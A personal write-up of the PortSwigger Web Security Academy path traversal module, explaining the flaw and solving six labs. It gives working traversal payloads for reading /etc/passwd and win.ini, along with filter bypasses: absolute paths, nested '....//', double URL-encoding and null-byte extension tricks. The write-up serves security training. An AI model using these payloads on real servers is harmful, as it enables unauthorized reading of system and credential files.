Path traversal module - Web Security Academy - PortSwigger
Definition
Path traversal (a.k.a Directory traversal) is a vulnerability that enable an attacker to read arbitrary files on the server that is running an application.
In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server.
Reading arbitrary files via path traversal
Imagine a shopping application that displays images of items for sale. This might load an image using the following HTML:
1
<img src="/loadImage?filename=218.png">
The loadImage
URL takes a filename
parameter and returns the contents of the specified file.
The image files are stored on disk in the location /var/www/images/
. To return an image, the application appends the requested filename to this base directory and uses a filesystem API to read the contents of the file. In other words, the application reads from the following file path:
1
/var/www/images/218.png
This application implements no defenses against path traversal attacks. As a result, an attacker can request the following URL to retrieve the /etc/passwd
file from the server’s filesystem:
1
https://testing-website.com/loadImage?filename=../../../etc/passwd
This cause the application to read from the following file path:
1
/var/www/images/../../../etc/passwd
The sequence ../
is valid within a file path, and means to step up one level in the directory structure.The three consecutive ../
sequences step up from /var/www/images/
to the filesystem root, and so the file that is actually read is:
1
/etc/passwd
On Unix-based operating systems, this is a standard file containing details of the users that are registered on the server, but an attacker could retrieve other arbitrary files using the same technique.
On Windows, both ../
and ..\
are valid directory traversal sequences. The following is an example of an equivalent attack against a Windows-based server:
1
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
LAB 1: Simple case of File path traversal
This lab contains a path traversal vulnerability in the display of product images.
The task is to retrieving the contents of the /etc/passwd
file based on the path traversal vulnerability.
Turn on Images
view on History filter to view the image loading history.
Obviously, this website contains a path traversal vulnerability through the filename
parameter.
Let’s add one of these requests which contains filename
parameter to the Repeater.
We can see that this GET
request is require a content on a folder named image
. But I don’t know where exactly does this folder locate in the filesystem. So, I have to try adding ../
until it comes to root.
If the path is incorrect, the application will return an error message: “No such file”.
Once obtaining the correct path, the server will return the content of the /etc/passwd
. The LAB is solved!
Common obstacles to exploiting path traversal vulnerabilities
Many applications that place user input into file paths implement defenses against path traversal attacks. These can often be bypassed.
If an application strips or blocks directory traversal sequences from the user-supplied filename, it might be possible to bypass the defense using a variety of techniques.
We might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd
, to directly reference a file without using any traversal sequences.
Moreover, we might be able to use nested traversal sequences, such as ....//
or ....\/
. These revert to simple traversal sequences when the inner sequence is stripped.
In some contexts, such as in a URL path or the filename parameter of a multipart/form-data
request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../
characters. This results in %2e%2e%2f
and %252e%252e%252f
respectively. Various non-standard encodings, such as ..%c0%af
or ..%ef%bc%8f
, may also work.
An application may require the user-supplied filename to start with the expected base folder, such as /var/www/images
. In this case, it might be possible to include the required base folder followed by suitable traversal sequences. For example: filename=/var/www/images/../../../etc/passwd
.
An application may require the user-supplied filename to end with an expected file extension, such as .png
. In this case, it might be possible to use a null byte to effectively terminate the file path before the required extension. For example: filename=../../../etc/passwd%00.png
.
LAB 2: File path traversal, traversal sequences blocked with absolute path bypass
This lab contains a path traversal vulnerability in the display of product images. The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory. To solve the lab, retrieve the contents of the
/etc/passwd
file.
First, turn on Images
view on History filter to view the image loading history like the previous LAB.
The task give me a hint that this website blocks traversal sequences such as ../
, but allows absolute path. So, I only need to change the path of the filename
parameter into /etc/passwd
.
LAB 3: File path traversal, traversal sequences stripped non-recursively
This lab contains a path traversal vulnerability in the display of product images. The application strips path traversal sequences from the user-supplied filename before using it. To solve the lab, retrieve the contents of the
/etc/passwd
file.
First, turn on Images
view on History filter to view the image loading history like the previous LAB.
In this LAB, it seems that the website blocks path traversal sequences input like ../
to make a path traversal attack.
So, I try using some techniques to bypass this filter. In this context, we can use ....//
or ....\/
alternatively to make a path traversal attack.
More explaination about this technique: The website has something like a function to “filter out” the suspicious users’ input like ../
. So, we try adding another ../
, the input now becomes ....//
. When the filter removes a ../
, there’s one left.
The path now becomes: ....//....//....//etc/passwd
. The LAB is solved!
LAB 4: File path traversal, traversal sequences stripped with superfluous URL-decode
This lab contains a path traversal vulnerability in the display of product images. The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it. To solve the lab, retrieve the contents of the
/etc/passwd
file.
First, turn on Images
view on History filter to view the image loading history like the previous LAB.
Following the task’s explaination, because the application performs an URL-decode on the input before passing to the server, I have to put in a URL-encoded path traversal sequences.
The URL-encoded form of ../
is ..%2F
.
Let’s try with the following input: ..%2F..%2F..%2Fetc/passwd
.
It returns an error message: “No such file”. Maybe there’re more than 1 decoder stage in the process.
Let’s performs a double-encoding: ../
→ ..%2F
→ ..%252F
.
Let’s try again with the following input: ..%252F..%252F..%252Fetc/passwd
.
One more note: I don’t need to perform an URL-encoding on the slash between etc
and passwd
. Because the application performs the decoding stage in order to prevents website from path traversal sequences, that slash is not on a path traversal sequence, so we don’t need to encode it.
The LAB is successfully solved!
LAB 5: File path traversal, validation of start of path
This lab contains a path traversal vulnerability in the display of product images. The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder. To solve the lab, retrieve the contents of the
/etc/passwd
file.
First, turn on Images
view on History filter to view the image loading history like the previous LAB.
This LAB is a little bit more special than others. Looking at the default request, the path of the image is not only the image file’s name anymore. Instead, it contains a special path: /var/www/images
.
Based on the task details, the path on the request has been started with the above expected path.
Try adding ../
after /var/www/images
to ensure that the path parsed contains the expected path, and also a path traversal sequence followed.
The full path: filename=/var/www/images/../../../etc/passwd
. The LAB is solved!
LAB 6: File path traversal, validation of file extension with null byte bypass
This lab contains a path traversal vulnerability in the display of product images. The application validates that the supplied filename ends with the expected file extension. To solve the lab, retrieve the contents of the
/etc/passwd
file.
As I mentioned above, in some contexts, application requires the extension of the file on the request is exactly what it is expected.
For example: filename=avatar.png
. But if we want to retrieve information from /etc/passwd
, we have to do something in order to make the path ends with .png
.
So, I use a technique called null byte injection: %00
.
What is %00
? This is the character that indicates the end of a sequence. when this character appears, every characters following is skipped (%00
is URL-encoded form of null byte
).
The input now becomes: filename=../../../etc/passwd%00.png
.
For example, if the input is only ../../../etc/passwd
, the server will return an error message: “No such file”.
The LAB is solved!